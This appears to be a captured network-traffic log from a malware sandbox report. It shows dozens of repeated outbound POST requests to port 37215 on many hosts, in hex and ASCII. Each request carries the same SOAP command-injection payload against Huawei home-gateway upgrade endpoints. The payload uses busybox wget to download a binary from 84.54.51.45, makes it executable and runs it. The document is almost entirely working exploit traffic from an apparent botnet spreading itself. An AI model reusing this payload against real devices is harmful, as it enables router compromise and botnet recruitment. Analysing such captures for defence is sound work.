                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            656192.168.2.155634041.232.26.337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160731077 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            657192.168.2.156062841.162.126.737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160732985 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            658192.168.2.154988641.52.221.20437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160736084 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            659192.168.2.153409041.111.1.20937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160775900 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            660192.168.2.154056241.156.40.10837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160775900 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            661192.168.2.154967241.232.85.20837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160815954 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            662192.168.2.155588841.164.50.13237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160845041 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            663192.168.2.155108241.228.172.10437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160845995 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            664192.168.2.155560041.222.117.7837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160845995 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            665192.168.2.154594641.12.239.9537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160866022 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 